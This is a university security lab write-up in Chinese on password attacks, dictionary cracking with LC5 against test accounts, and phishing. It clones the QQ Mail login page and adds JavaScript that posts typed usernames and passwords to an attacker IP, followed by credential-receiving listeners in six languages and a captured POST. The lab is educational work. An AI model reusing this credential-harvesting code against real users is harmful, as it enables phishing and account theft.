口令攻击和钓鱼攻击

1、实验说明

口令攻击和钓鱼攻击是生活中两种较为常见的攻击方式，通过对攻击过程的复现，能够让学生对其有直观的认识，进而思考相应的防范措施。

2、实验目的

（1 ）能够了解实验规范和实验所需的编程环境

（2 ）能够理解社会工程学在口令攻击中的作用，掌握设计安全口令的方法

（3 ）能够掌握钓鱼攻击技术和相应的防范手段

（4 ）培养公民意识，提高社会责任感，积极向社会普及信息安全知识

练习 1 Windows口令破解

字典破解是口令攻击的一种常用方式，是指破解者通过对用户的了解，猜测其可能使用某些信息作为密码，例如其姓名、生日、电话号码等，同时结合对密码长度的猜测，利用工具来生成密码破解字典。

基本操作

（1 ）两人一组，相互为对方计算机新增账户并设置密码，并向对方提供一定的提示信息。为了达到实验效果，用户口令不要设置得过于复杂。

计算机右键，管理，创建新用户

（2 ）根据对方所给的提示，并结合自己日常的了解猜测可能设置的密码，生成密码字典。

（3 ）进入实验平台，单击工具栏“字典生成器”按钮，启动“字典生成器” 。选择“生日”标签页，输入的年份与月份信息应尽量包含步骤(1) 中用到的生日日期，在“生成字典”标签页中确定字典文件存放的路径以及新用户口令位数，最后生成字典文件。

（4 ）单击工具栏LC5按钮，启动LC5口令破解工具。选择Session（会话）｜Session Options…（会话选项）菜单项，在弹出的Auditing Options For This Session对话框中选中Dictionary Crack项的Enabled，取消其它项的Enabled。单击Dictionary List（字典列表）按钮，导入步骤(2)中生成的字典文件。返回LC5主界面，选择Session｜Import…（导入）菜单项，在弹出的Import对话框中导入本地用户列表，选择Session｜BeginAudit（开始审计）菜单项，开始字典破解用户口令。

思考与总结

（1 ）总结设计安全口令的因素，以及应如何设计安全的口令。

增加密码长度和样式，不短于6位，使用大小写字母、数组、字符组合
避开个人信息，不要使用生日、手机号、车牌号等，实在想使用可以用身边人的信息
定期修改密码
避免个人信息泄露
避免同一密码重复使用

练习 2 QQ邮箱的钓鱼攻击

从社会工程学的角度来说，往往由于用户的疏忽大意，不小心访问了错误的网站，而该网站的页面与正常网站并无差别，用户在输入个人私密信息后，用户的敏感信息便被非法的窃取。

钓鱼

1、构造钓鱼页面

（1 ）打开 https://mail.qq.com/ ，右键快捷菜单保存 QQ 邮箱首页，保存网页的全部内容，如图所示。

（2 ）用文本编辑器打开文件夹中的 xlogin.html 文件，定位到登录按钮（login_button）代码处，为其添加单击事件。同时，在<script>区域中添加单击click事件响应函数，将得到的账号和密码通过 HTTP/POST 方法发送至目标服务器，并将其中的 IP 地址修改为实验所用主机的 IP 地址，如图所示。

在代码中我们可以找到 <input >标签，这是一种用于为基于 Web 的表单创建交互式控件的HTML <input> 元素，而其又同时指定了type为submit，表明这是用于提交表单的按钮。

 onclick="saveAccount()"

接下来编写 saveAccount()函数，该会在按钮点击时间时触发，其是通过id取值，随后建立HTTP请求将信息发送到指定位置。通过浏览器调试我们可以发现，id为'u'的正是第一个输入框，同样，id为'p'的是第二个输入框。

function saveAccount() {// 通过 id 获取元素值var user = document.getElementById("u").value;var passwd = document.getElementById("p").value;// 创建XMLHttpRequest 对象var httpRequest = new XMLHttpRequest();// 建立一个 HTTP 异步请求httpRequest.open('POST', 'http://XXX.XXX.XXX.XXX:9090', true);// 设置HTTP请求头部 C..参数的值为ap...httpRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");// 	发送请求httpRequest.send('user=' + user + 'pwd=' + passwd);
}

为登录按钮添加单击事件和响应函数

## 接收

2 、接收钓鱼所得的账号和密码（分档）
（1 ）第一档：编写网络服务端程序，接收并显示钓鱼页面所发送的账号和密码，编程语言不限， C 、Java 、C# 、Python 均可，系统运行环境不限。

Go

提供的几种语言都是比较常见的，那么我们先使用Go语言实现，如果使用jetBrain系列产品可能会比较慢，我们可以直接在命令行运行。

package main
import ("bufio""fmt""io""log""net"
)func main() {ln, err := net.Listen("tcp", ":9090")if err != nil {panic(err)}conn, err := ln.Accept()if err != nil {log.Fatal("get client connection error: ", err)}br := bufio.NewReader(conn)for{data, err := br.ReadString('\n')if err == io.EOF{break}fmt.Printf("%s", data)fmt.Fprintf(conn, "OK\n")}conn.Close()
}

C/CPP

如果你使用CLion 要在CMakeLists.txt文件中添加link_libraries(ws2_32)

#include <stdio.h>
#include <stdlib.h>
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib")  //加载 ws2_32.dll
#define BUF_SIZE 1024//变量声明
WSADATA wsd;
SOCKET sServer; //用于监听
SOCKET sClient; //实现与客户端通信
int retVal;
SOCKADDR_IN addrsServ{}; // C语言就去除{}
char buf[BUF_SIZE];    //用于接收数据int main(){//初始化if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0){printf("WSAstartup failed!\n");return 0;}//监听sServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);if (INVALID_SOCKET == sServer){printf("socket error!\n");WSACleanup();return 0 ;}printf("TCP socket Success!\n");// bind 设置地址addrsServ.sin_family = AF_INET;addrsServ.sin_addr.s_addr = inet_addr("192.168.43.161");addrsServ.sin_port = htons(9090);addrsServ.sin_addr.S_un.S_addr = htonl(INADDR_ANY);int sSreveraddlen = sizeof(addrsServ);//绑定地址retVal = bind(sServer, (const struct sockaddr *)&addrsServ, sizeof(SOCKADDR_IN));if (SOCKET_ERROR == retVal){printf("bind failed!\n");closesocket(sServer);WSACleanup();return 0;}printf("bind Success!\n");//监听 listenretVal = listen(sServer, 1);if (SOCKET_ERROR == retVal){printf("listen failed!\n");closesocket(sServer);WSACleanup();return 0 ;}printf("listen Success!\n");//接收数据SOCKADDR_IN addrcClient{}; // C语言就去除{}int cClientaddlen = sizeof(addrcClient);sClient = accept(sServer, (struct sockaddr *)&addrcClient, &cClientaddlen);if (INVALID_SOCKET == sClient){printf("accept failed!\n");closesocket(sServer);closesocket(sClient);WSACleanup();return 0;}printf("perfect!\n");// 阻塞等待 一直接收ZeroMemory(buf, BUF_SIZE);retVal = recv(sClient, buf, 1024, 0);if (SOCKET_ERROR == retVal) {printf("recv failed！");closesocket(sServer);closesocket(sClient);WSACleanup();return 0;}printf("\nMessage form server: %s\n", buf);
}

运行效果，发现成功将用户名密码发送出来。

Java

也可以使用Java监听，但不知为何，Java很长一段都处于阻塞状态，接收完标头后很久才接收数据，后来发现这是read()方法当读取完数据之后就开始阻塞，但还要一直等到返回-1才能结束。

package com.tcp.listen;import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;public class Listen {public static void main(String[] args) throws IOException {try (ServerSocket ss = new ServerSocket(9090);Socket s = ss.accept();InputStream is = s.getInputStream();InputStreamReader isr = new InputStreamReader(is);BufferedReader br = new BufferedReader(isr);) {for (int i = 0; i < 20; i++) {System.out.println(br.readLine());}} catch (IOException e) {e.printStackTrace();}}
}

C#

using System;
using System.Net;               // 引入这两个命名空间，以下同
using System.Net.Sockets;
using System.Text;namespace ConsoleAppListen
{class Program{static void Main(string[] args){const int BufferSize = 8192;    // 缓存大小，8192字节Console.WriteLine("Server is running ... ");IPAddress ip = new IPAddress(new byte[] {192, 168, 43, 161});TcpListener listener = new TcpListener(ip, 9090);listener.Start(); // 开始侦听Console.WriteLine("Start Listening ...");// 获取一个连接，中断方法TcpClient remoteClient = listener.AcceptTcpClient();// 获得流，并写入buffer中NetworkStream streamToClient = remoteClient.GetStream();byte[] buffer = new byte[BufferSize];int bytesReadLen = streamToClient.Read(buffer, 0, BufferSize);// 获得请求的字符串string msg = Encoding.UTF8.GetString(buffer, 0, bytesReadLen);Console.WriteLine("Received: {0}", msg);}}
}

Python

import socket
# 创建流式套接字
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 监听端口
s.bind(('192.168.43.161', 9090))
# 最大连接数量
s.listen(5)
print('Waiting for connection...')while True:# 接受一个新连接sock, addr = s.accept()print('Connect Success!')# 创建新线程来处理TCP连接:data = sock.recv(1024)  # 接受的数据print(data.decode())  # 将数据进行解码

PHP

<?php
$ip = '192.168.43.161';
$port = 9090;
//创建socket
$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
//把socket绑定在一个IP地址和端口上
socket_bind($socket,$ip,$port);
//监听由指定socket的所有连接
socket_listen($socket,4);
while(true){//接收一个Socket连接$sk = socket_accept($socket);// 获得客户端的输入$buf = socket_read($sk, 2048);echo $buf;//关闭socketsocket_close($sk);
}
?>

验证

3 、实验验证

（1 )用浏览器打开保存的 QQ 邮箱首页，填写账号和密码，然后单击登录按钮，观察服务端程序所接收到的数据。

POST / HTTP/1.1
Host: 192.168.43.161:9090
Connection: keep-alive
Content-Length: 19
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: null
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8user=123456&pwd=123

我们可以发现其内容正是此次HTTP POST请求的标头